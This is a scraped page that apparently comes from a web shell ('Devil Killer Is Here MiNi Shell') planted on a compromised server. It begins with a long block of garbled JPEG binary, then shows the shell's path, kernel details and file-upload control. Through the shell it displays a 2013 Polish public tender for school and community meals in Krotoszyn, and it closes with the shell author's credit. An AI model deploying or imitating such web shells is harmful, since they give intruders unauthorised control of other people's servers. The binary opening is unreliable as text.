JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131212/270357-N-2013.html

<p class="kh_header"><b>Krotoszyn: Dożywianie uczniów szkół podstawowych i gimnazjalnych oraz innych osób na terenie miasta i gminy Krotoszyn w 2014 roku.</b><br>
<b>Numer ogłoszenia: 270357 - 2013; data zamieszczenia: 12.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Krotoszynie , ul. Kobylińska 10a, 63-700 Krotoszyn, woj. wielkopolskie, tel. 62 7253668, faks 62 7253668.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mgops.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie uczniów szkół podstawowych i gimnazjalnych oraz innych osób na terenie miasta i gminy Krotoszyn w 2014 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przygotowanie i dostarczenie własnym transportem posiłków dla uczniów szkół podstawowych i gimnazjalnych i  innych  osób na  terenie miasta Krotoszyna w  roku 2014  - Część I; Przygotowanie  i dostarczenie własnym transportem posiłków dla uczniów szkół podstawowych i gimnazjalnych  na  terenie gminy Krotoszyn w roku 2014 - Część II.
Opis  zamówienia  - Część I: 1. Przedmiotem zamówienia jest przygotowanie i dostarczenie do Zespołu Szkół Nr 2 w Krotoszynie PL. Szkolny 19  w roku  2014 dla około 20  uczniów  obiadów (około 2.500 porcji) typu: mięso 100 gram, surówka 80 gram, ziemniaki 200 gram, kompot 150 ml. pozostały 1 dzień zupa (400 ml) z wkładką mięsną z pieczywem - ok 200 gram, lub zamiennie naleśniki, placki ziemniaczane, pierogi, pyzy kluski itp. 
W cenie obiadu należy uwzględnić koszty dowozu, naczyń, obsługi.                           
2. Przygotowanie i wydanie obiadów dla około 100 dorosłych osób, oraz około 10 uczniów szkół ponadgimnazjalnych  i około 20 uczniów szkół podstawowych i gimnazjalnych w okresie wakacyjnym (około 21.000 porcji).  W miesiącu styczniu, lutym, marcu październiku, listopadzie, grudniu - około 100  w pozostałe miesiące - około 30 osób. Obiady typu: mięso 100 gram, surówka 80 gram, ziemniaki 200 gram,  pozostały 1 dzień zupa (400 ml) z wkładką mięsną z pieczywem - ok. 200 gram lub naleśniki, lub placki ziemniaczane, pierogi, pyzy kluski itp.,kompot, sok 150 ml we własnym lub wynajętym na własny koszt lokalu na  terenie miasta Krotoszyna. Lokal musi spełniać wymogi sanitarne związane z wydawaniem i konsumpcją na miejscu posiłków dla około110 osób. Wszystkie koszty utrzymania  lokalu związane z   mediami (woda, gaz, energia) ponosi  Wykonawca. W cenie  obiadu należy uwzględnić koszty dowozu, naczyń, obsługi. Posiłki muszą być  sporządzone zgodnie z wymogami sztuki kulinarnej i 
żywienia zbiorowego. Muszą być sporządzone ze świeżych artykułów spożywczych posiadających aktualne terminy ważności. 
Opis  zamówienia  - Część II:
1.	Przedmiotem zamówienia jest przygotowanie i dostarczenie do szkół w roku 2014 obiadów ogółem dla około 45  uczniów (około 7000 porcji)  w szkołach: Szkoła Podstawowa w Biadkach  w Zespołach Szkół w:  Benicach,  Orpiszewie.
Poszczególne miejscowości  położone są  na terenie w gminy Krotoszyn   w              
promieniu 50 kilometrów. Posiłek ma być jednodaniowy, a przynajmniej 4 razy w tygodniu winien być to posiłek  mięsny typu: mięso 100 gram, surówka 80 gram, ziemniaki 200 gram, kompot 150 ml. Pozostały 1 dzień zupa z wkładką mięsną z pieczywem - ok 200 gram.
2. Przygotowanie i dostarczenie własnym transportem zgodnie z wymogami  
sanitarnymi  obiadów w boksach termoizolacyjnych wraz z jednorazowymi 
sztućcami dla około 35 uczniów (około 6.000 porcji) w szkołach na terenie    
gminy  Krotoszyn w roku 2014 w  niżej wymienionych miejscowościach:
Gorzupia, Kobierno , Lutogniew, Brzoza, Wielowieś, Roszki.
Poszczególne miejscowości  znajdują się na terenie gminy Krotoszyn w 
promieniu 50 kilometrów. Zamawiający zastrzega, iż ilość uczniów korzystających z 
posiłków w roku  2014 może zmienić się w trakcie obowiązywania umowy i 
każdorazowo Zamawiający będzie informował o ilości posiłków, które Wykonawca     
winien dostarczyć do poszczególnych placówek. Możliwa jest również 
zmiana  placówek szkolnych, do których będą dostarczane posiłki.
Posiłki winne być  dostarczone do  poszczególnych szkół 
najpóźniej do  godz.13:00. Posiłki  do szkół winne być dostarczane w 
termoizolacyjnych termosach,  aby  uczniowie  otrzymali ciepły posiłek.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia  zamówień uzupełniających, o których mowa w art. 
67 ust. 1 pkt 6 ustawy z dnia 29  stycznia 2004 r. Prawo zamówień publicznych.
do 50 % zamówienia podstawowego polegającego na powtórzeniu tego samego rodzaju zamówienia na część I i część II zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.20.00-3, 55.32.10.00-6, 55.52.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie jest wymagany</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie - warunek: w okresie ostatnich 3 lat a jeżeli okres działalności jest krótszy w tym okresie wykonał co najmniej 2 zamówienia o wartości min 50 tys. brutto zł, każda w zakresie usług stanowiących przedmiot niniejszego zamówienia. Wykonawca spełni warunek niniejszego zamówienia jeżeli wykaże wykonanie w/w usług oraz przedłoży dokumenty potwierdzające, że usługi te  zostały należycie wykonane. Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach jakich żąda Zamawiający. Z dokumentów musi jasno  wynikać, że wykonawca spełnia warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie jest wymagany</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie jest wymagany</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji  finansowej zapewniającej wykonanie zamówienia - warunek: Wykonawca  wykaże posiadanie środków finansowych na podstawowym rachunku   bankowym lub zdolność kredytową w wysokości co najmniej 10 tys. złotych. Ocena spełnienia warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach jakich żąda Zamawiający. Z dokumentów musi jasno  wynikać, że wykonawca spełnia warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wypełniony formularz ofertowy, parafowany projekt umowy.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy, zaakceptowany projekt umowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - odległość od kuchni w której realizowane będzie zamówienie do siedziby MGOPS Krotoszyn ul. Kobylinska 10a - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian w umowie.
Zmiana umowy może być dokonana w granicach wyznaczonych przepisami PZP, w tym art. 144 ustawy PZP, wyłącznie za zgodą obu stron w formie pisemnej pod rygorem nieważności. Poza przypadkami określonymi w umowie, zmiany umowy będą mogły nastąpić w  następujących okolicznościach: Zaistnienia po zawarciu umowy siły wyższej, przez którą należy rozumieć zdarzenie zewnętrzne o charakterze niezależnym od stron: którego nie można było przewidzieć przed zawarciem umowy, którego nie można było uniknąć  ani strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar, i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, 
a) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron (zmiana podatku VAT);
b) zaistnienia po stronie Zamawiającego okoliczności spowodowanych sytuacją finansową, zdolnościami płatniczymi, okolicznościami, które nie  można było przewidzieć w chwili zawarcia umowy;
c) zmiany ilości osób  uprawnionych do korzystania z posiłków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mgops.krotoszn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko Gminny Ośrodek Pomocy Społecznej, 63-700 Krotoszyn ul. Kobylińska 10a pokój nr 1 - parter budynku.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 08:00, miejsce: Miejsko Gminny Ośrodek Pomocy Społecznej, 63-700 Krotoszyn ul. Kobylińska 10a pokój nr 3.(Sekretariat) - parter budynku..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest przygotowanie,  i dostarczenie własnym   transportem  posiłków dla uczniów szkół podstawowych i gimnazjalnych i  
innych  osób na  terenie miasta Krotoszyna w   roku 2014  - Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis części zamówienia  - Część I
1. Przedmiotem zamówienia jest przygotowanie i dostarczenie do Zespołu Szkół Nr 2 w Krotoszynie PL. Szkolny 19  w roku  2014 dla około 20  uczniów  obiadów (około 2.500 porcji) typu:  mięso 100 gram, surówka 80 gram,  ziemniaki 200 gram, kompot 150 ml,  pozostały 1 dzień zupa (400 ml)  z wkładką mięsną z pieczywem - ok 200 gram lub naleśniki, placki ziemniaczane, pierogi, pyzy kluski itp. W cenie obiadu należy uwzględnić koszty dowozu, naczyń.  
2. Przygotowanie i wydanie obiadów dla około 100 dorosłych osób, oraz około 10 uczniów szkół ponadgimnazjalnych  i około 20 uczniów szkół podstawowych i gimnazjalnych w okresie wakacyjnym ( około 21.000 porcji).
W miesiącu styczniu, lutym, marcu, październiku, listopadzie,  grudniu 2014 r. - około 100  osób, w pozostałe miesiące - około 30 osób.  Obiady typu:  mięso 100 gram, surówka 80 gram, ziemniaki 200 gram, pozostały 1 dzień zupa( 400 ml) z wkładką mięsną z pieczywem - ok. 200 gram lub naleśniki, placki ziemniaczane, pierogi, pyzy kluski itp., kompot, sok 150 ml we własnym lub wynajętym na własny koszt lokalu na terenie miasta  Krotoszyna. Lokal musi spełniać wymogi sanitarne związane z 
wydawaniem i konsumpcją na miejscu posiłków dla około110 osób. Wszystkie koszty utrzymania  lokalu związane z mediami (woda, gaz, energia) ponosi  Wykonawca. W cenie  obiadu należy uwzględnić koszty dowozu, naczyń , obsługi.
Posiłki muszą być  sporządzone zgodnie z wymogami sztuki kulinarnej i żywienia zbiorowego. Muszą być sporządzone ze świeżych artykułów spożywczych posiadających aktualne terminy ważności..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.20.00-3, 55.32.10.00-6, 55.52.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. odległość od kuchni, w której realizowane będzie  zamówienie do siedziby MGOPS w Krotoszynie ul. Kobylińska 10a - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przygotowanie  i dostarczenie własnym transportem posiłków dla uczniów  szkół podstawowych i gimnazjalnych  na  terenie gminy Krotoszyn w roku 2014
-  część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis części zamówienia - Część II
1. Przedmiotem zamówienia jest przygotowanie i dostarczenie do szkół w roku 2014 obiadów ogółem dla około 45  uczniów (około 7.000 porcji)  w szkołach: Szkoła Podstawowa w Biadkach w Zespołach Szkół w:  Benicach,  Orpiszewie. Poszczególne miejscowości  położone są  na terenie w gminy Krotoszyn  w promieniu 50 kilometrów. Posiłek ma być jednodaniowy, a przynajmniej 4 razy w tygodniu winien być  to posiłek  mięsny typu:  mięso 100 gram, surówka 80 gram, ziemniaki 200 gram, kompot 150 ml. Pozostały 1 dzień zupa  z wkładką mięsną z pieczywem - ok 200 gram.
2. Przygotowanie i dostarczenie własnym transportem zgodnie z wymogami sanitarnymi  obiadów w boksach termoizolacyjnych wraz z jednorazowymi sztućcami dla około 35 uczniów (około 6000 porcji) w szkołach na terenie gminy  Krotoszyn w roku 2014 w niżej wymienionych miejscowościach: Gorzupia, Kobierno , Lutogniew, Brzoza, Wielowieś, Roszki. Poszczególne miejscowości  znajdują się na terenie gminy Krotoszyn w  promieniu 50 kilometrów.  Zamawiający zastrzega, iż ilość uczniów korzystających z posiłków w roku  2014 może zmienić się w trakcie obowiązywania umowy i każdorazowo Zamawiający będzie informował Wykonawcę o ilości posiłków,  które Wykonawca winien dostarczyć do poszczególnych  placówek. Możliwa jest również zmiana  placówek szkolnych do których będą dostarczane posiłki. Posiłki winne być  dostarczone do  poszczególnych szkół  najpóźniej do  godz.13:00. Posiłki  do szkół winne być dostarczane w termoizolacyjnych termosach,  aby  uczniowie  otrzymali ciepły posiłek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.20.00-3, 55.32.10.00-6, 55.52.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. odległość od kuchni w której realizowane będzie zamówienie do siedziby MGOPS Krotoszyn ul. Kobylińska 10a - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com